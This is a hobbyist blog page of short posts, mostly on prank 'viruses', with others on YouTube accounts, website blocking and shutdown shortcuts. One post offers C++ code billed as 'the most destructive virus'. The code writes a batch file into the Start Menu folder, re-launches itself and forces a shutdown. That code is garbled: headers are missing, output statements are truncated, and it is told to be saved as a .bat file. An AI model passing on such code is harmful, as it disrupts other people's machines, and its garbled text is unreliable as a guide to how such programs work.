Tuesday, 18 April 2017

How to create a Fake Computer virus || Updated 2017



A Computer virus is a malware piece of code that, if executed, replicates by inserting copies of itself into other programs, data files. A simple virus that can make a copy of itself over and over again is relatively easy to produce.
Here we will create a fake computer virus using Notepad. Its a cool trick techprank that you can play on your friend. So the first of your friend circle to grab this opportunity to play this fake computer virus prank on your friend.
Steps:-
1. Open the Notepad on you computer System
2. Writ the below codes in the Notepad or copy and paste in your Notepad


@echo off
mode 100

echo Hello Guys!
echo I am your bro
echo Welcome to the world of viruses
echo virus downloaded
echo You have now entered The Matrix.....
Pause
goto matrix
:matrix
color a
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%

goto start 

3. save it as brosvilla.bat
4. an icon will be created, hit the enter button to run it
fake computer virus || updated 2017
©brosvilla


Hope you have a nice fake computer virus prank, if you find any problem do comment and do let me know the problem if you had faced.
Happy coding!!!


Share:

Thursday, 13 April 2017

How to make computer virus using Notepad ǀǀ Matrix ǀǀ Updated


A Computer Virus is a piece of code that is capable of copying itself and typically has detrimental effect, such as corrupting the system or destroying data.

A Computer virus is a malware program that, when executed, replicates by inserting copies of itself into other programs, data files, or the boot sector of the hard drive; when this replication succeeds, the affected areas are then said to be "infected". A simple virus that can make a copy of itself over and over again is relatively easy to produce. An even more dangerous type of virus is one capable of transmitting itself across networks and bypassing security systems.These programs periodically check your computer system for the best-known types of viruses.In this post, I'm going to make the most destructive virus ever created by any Software Engineer. 

Warning -please do not run it on your computer or in school/ college computers

1. Open Notepad
2. Type in the following codes in the Notepad:-

#include
#include
#include
#include
#include
#include
#include
using namespace std;
int main()
{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);
{
char buffer[255];
char inputFile[]="C:\Documents and Settings\All Users\Start Menu\Programs\rawr.bat";
ifstream input(inputFile);
if (!input)
{
  {
ofstream fp("C:\Documents and Settings\All Users\Start Menu\Programs\rawr.bat", ios::app);
fp
fp
fp
  }
}
else
{
while (!input.eof())
  {
input.getline(buffer,255);
  }
 }
}

{
char buffer[255];
char inputFile[]="C:\rawr.exe";
ifstream input(inputFile);
if (!input)
{
 {
  {
ofstream fp("CLICK.bat", ios::app);
fp
fp
fp
fp
}
system("START CLICK.bat");
main();
 }
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
  }
 }
}

START: 
{
for(int i = 0; i < 1; i++)
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
Sleep(60);
 }
}
for ( int j = 0; j < 5; j++)
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout
}
goto START;

3. Save it as matrix.bat

And we are done with this. If you find any problem in executing this prank, do comment in the comment section. 
Share:

Saturday, 23 April 2016

How to Monetize YouTube Channel

Monetizing your Youtube  Channel is the best way to earn  huge money through this popular video-sharing site. Monetizing your YouTube channel is easy. Anyone can get huge bucks from their uploaded video throgh their Yotube channel through Ads displayed on their video or views etc. YouTube places ads inside or near videos. After you’ve enabled monetization on your YouTube channel, your videos can be submitted and approved for monetization.
 In order to earn the revenue that is generated from these ads, you will need to associate an AdSense account with your YouTube account.For a video to be eligible, you must own worldwide commercial rights to everything in the video. 
In addition to complying with YouTube’s copyright policies, videos must abide by YouTube’s Terms of Service and Community Guidelines.
The two key factors for earnings are the type of ads and the pricing of the ads appearing with your videos. You will make money per ad click[PAC] and total views.
Follow the steps to Monetize your Youtube channel account:-



Share:

How to create a youtube account

Hey Bros! howz you doing?
This i my first blog in my Youtube labelled blog of my blog Hackers villa.
So many of my blog visitors requeted  to start posting about Youtube, So i decided to to start from beginning of the Youtube.
Creating a YouTube account is free, quick, and painless. To create a YouTube account, just submit a few bits of basic information and create a username and password. Lets start the stuff without wasting time as Time Is Money.
So easy???  you don’t even  need to add your street address or phone number, and YouTube doesn’t ask you for a credit card number.
Follow the steps to create Youtube account for you:-

related post : How to monetize your Youtube account
Share:

Friday, 22 April 2016

How to block / unblock any website

How to block / unblock any website

BROS! Do you want to block all users of a Windows PC from opening certain websites, regardless of which browser whether you want to restrict access altogether or only during specified hours of the day?You need only make a few simple additions to the Windows hosts file.
 This method does not require any Software to download, it is totally free!!!
 It's an effective method for restricting users of all ages from seeing the content you don’t want them to access. It specially beneficial for those Parents whose kids (like me..lol) staying up all night browsing Facebook, YouTube, and GOD knows what else certainly is not a healthy lifestyle.



Here’s our guide to blocking a website using some of the better fool-proof methods.

Pick a blocking method:-
1. Block using Windows hosts file
2. Block using Mac OS X hosts file
3. Block using your router settings

Block using Windows hosts file

also read : Windows shutdown prank

Share:

Sunday, 17 April 2016

Windows shutdown prank

  How to create Shutdown Shortcut in Windows  

Windows 8's start menu interferes with the old, convenient method of using keyboard shortcuts (via the Windows key) to quickly restart or shut down your machine.
 Here's a little trick that sort of brings back that time saver. All you need to do is pull up the power tools menu with WIN + X , then U and the underlined letter for the shut down option of your choice.
The procedure for Windows 7 is very similar to that of Vista and XP, but now you can pin those freshly created shortcuts to the Start Menu or the Taskbar or both.
Where Windows 7 displays its power button in a prominent place on its Start Menu, both Windows and the new Windows 8.1 make you perform several actions just to turn your computer off and they're all buried. 
Fortunately, there's an easy way to put the shutdown and restart functions just one click away from the desktop and Start screen.
Just create shortcuts for both actions using the following steps:

Share:

Tuesday, 12 April 2016

How to make the most destructive virus (must see) using notepad



Let us , first define the computer virus. It could be defined as a piece of code that is capable of copying itself and typically has detrimental effect, such as corrupting the system or destroying data.

A Computer virus is a malware program that, when executed, replicates by inserting copies of itself into other programs, data files, or the boot sector of the hard drive; when this replication succeeds, the affected areas are then said to be "infected".A simple virus that can make a copy of itself over and over again is relatively easy to produce. An even more dangerous type of virus is one capable of transmitting itself across networks and bypassing security systems.

Since 1987, when a virus infected ARPANET, a large network used by the Defense Department and many universities, many antivirus programs have become available.

 These programs periodically check your computer system for the best-known types of viruses.

Some people distinguish between general viruses and worms. 

A worm is a special type of virus that can replicate itself and use memory, but cannot attach itself to other programs.

In this post, I'm going to make the most destructive virus ever created by any Software Engineer. 
It is one of the most complicated virus ever known to exist. 

So lets make this virus.

Warning : This is just for Educational purpose, please don't apply in your school or college PC.

To make this virus just follow these simple steps:-

1. Open the Notepad on your PC

2. Type in the following simple Codes:-


Share:

Categories

Blog Archive

copyright @bros villa. Powered by Blogger.

Copyright © Hackers villa | Powered by Blogger Design by PWT | Blogger Theme by NewBloggerThemes.com